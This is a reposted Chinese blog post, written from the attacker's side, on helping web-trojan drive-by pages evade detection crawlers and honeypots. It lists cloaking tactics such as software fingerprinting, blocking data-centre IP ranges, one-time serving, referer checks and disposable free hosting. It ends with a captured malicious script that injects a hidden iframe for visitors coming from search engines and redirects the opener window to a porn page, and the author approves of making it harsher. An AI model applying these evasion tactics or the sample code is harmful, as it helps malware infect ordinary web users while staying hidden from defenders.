网马的反挂马检测及精确投放(免杀)

 

前天shadow在群里提到或许可以采取一些方法来实现对挂马检测系统的绕过,遂与其深入探讨了下,事后又考虑到网马的精确投放,总结了一些点做了点儿技术实现 ,并在这里简单记录下想到的一些想法,欢迎其他大牛不吝指教。

1、通过判断客户端安装程序指定挂马

这个是个老早的话题,早在两年前cos他们就在xkungfoo议题上提到过了:通过img标签远程域检测本地域软件是否存在 。当然还可以通过其他方式,譬如判断目标组件是否可被调用等。

这样做主要有几方面原因:

一是对于某些搞不定的杀毒软件、防火墙或hips直接采取绕过的方式,避免没有必要的网马行为泄露。

二是通过一些特征分析来区分挂马检测系统和用户电脑。譬如安装路径的不同,或者一些通用软件的安装关联性等等。当然目前一些蜜罐系统的软件安装行为几乎与用户行为相近或相同,使得这个想法具有理论可行性,不具有实际价值。

三是判断漏洞利用条件是否满足,譬如XX视频软件的溢出漏洞之类,如果没有这类软件被安装,那么网马则无需暴露给用户。

2、判断是否是spider IP段

这个是shadow提到的,我认为还是具有很大的可行性的。

 

我通过纯真IP库查询了所有的IDC IP段,然后导入数组中,再跟当前的IP做判断。如果发现在段内,则返回anti robots否则返回echo virus

 

从理论上来说,所有安放在IDC机房内的spider就都会被屏蔽住了;但实际上存在很大的限制性 —— 原因就是纯真IP库的信息不够充分,而且挂马检测系统想搞一个在列表外的IP也很容易,不过后面我们会提到一个可行的获取spider IP的方案。

3、判断是否访问过

其实我们知道,对于一个职业的网马来说,如果一个用户访问了页面,那么要么中招要么不中招,不可能第一次访问中了第二次不中,或者第一次访问不中第 二次中了。那种覆盖大量内存或占用大量CPU资源导致用户“等不及”中马就关闭浏览器的网马其实不够专业,但是即便如此,我们仍可以通过设置用户访问两次 或几次后就不再对页面注入网马内容的方式来稍微放宽策略。

这样做的另外一个原因是用来迷惑spider。从我目前知道的情况来看,一旦挂马检测系统确认该网站已中招,那么便会在很快的时间内再次轮回检测一次。而如果网马做了这样的限制,那么当spider第二次访问时就会误报成没有病毒,该站点在以后的时间里就会逐渐被忽略掉!

我在我的demo中通过简单验证IP来判断是否访问过,这个或许可以通过其他一些方式来取得客户端的唯一指纹,这里就不再深入了解了。不过需要注意 这个指纹无法放到蜜罐中,因为蜜罐会不定期被还原,因此不管是cookies、localStorage……还是flash cookies留下的痕迹都将被清除。

4、判断系统版本和浏览器版本

这个跟想法1 中提到的观点相同 —— 用于网马的精确投放以及减少没必要的网马行径泄露。

并且如果分析人员想要分析被网马检测系统找到的网马,那么他需要“重现环境”来获取代码,否则就可能误以为该网马已经失效……(譬如采取wget这种安全方式来获取网马代码之类的,在以后分析人员将获取不到任何数据)

5、判断referer

这个一是为了限制分析人员和检测系统对网马的直接取样(效果不大),和对受害站点的状态跟踪。

另外也是为了防止被陷害。譬如本来挂的游戏网站,问题不大;结果被某些人搞到GOV上去了,这个罪过可就大了,而且GOV会调人来跟,被搞的可能性会大幅增加,惩罚也将更加严重。

6、使用免费空间+免费二级域名+二次中转解析等方式隐藏行踪

这点应该跟反检测有点儿关系,而且目前一些专业的黑产貌似也有这样做的。

好处有几个:

一是如果一个网马地址被拉入黑名单,则可以迅速使用另一个

二是有效防止被“抄家”

7、spider IP的确认

目前国内的spider差不多都有这个能力 —— 在一两天内巡回国内所有站点一次。

我们假设一个黑产挂了5个马到不同网站上,但是都被同一IP访问过,那么这个IP就可以认定是spider IP,可以加到IP库中。

对于同一个站点,如果每天都被访问一两次,被连续访问了若干天,并且访问时长大致相同,而且可以通过想法4 (如果不符合,则不会加载网马)的判断但是却没有在“肉鸡管理系统”中有所体现,那么大致可以鉴定是蜜罐系统(额,也可能是还原精灵,但是那些用户不会如此勤奋的访问),所以此时也可以将IP入库。

最终比的是,到底是挂马检测系统换IP勤奋,还是网马加IP勤奋。

 

 

前两天谈到网马的反挂马检测及精确投放 ,今天又抓到一个样本。

//判断referer,如果是直接访问则过
//如果是从搜索引擎进来的,则挂马
var url=document.referrer;
var p=url.toLowerCase().indexOf(".baidu.com");
if (p>0)
{
document.writeln("<iframe src=*** width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".google.com.hk");
if (p>0)
{
document.writeln("<iframe src=*** width=0 height=0></iframe>");
}
...
...省略若干搜索引擎
...
//monyer ps:难道还要像北京交通一样限制单双号?
today=new Date();
riqi=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();
//跟上面判断referer一样的判断
var regexp=//.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|gougou|)(/.[a-z0-9/-]+){1,2}///ig;
var where =document.referrer;
if(regexp.test(where))
{
//父窗口再转向一个色情页面
window.opener.navigate("http://***");
}

简单来说就是:

直接访问页面不会挂马,如果通过搜索引擎进来的,则中招!

如果再狠一些,限制个时间啥的就更NB了,哈哈。

这样做的一个好处是可以直接bypass挂马检测系统,因为挂马检测系统大都是基于行为分析的;并且可以迷惑一些分析者,只是如果能做在服务端就更好了。

 

转自:

网马的反挂马检测及精确投放

网马的反挂马检测及精确投放(续)

 

你可能感兴趣的:(搜索引擎,iframe,浏览器,Yahoo,Cookies,杀毒软件)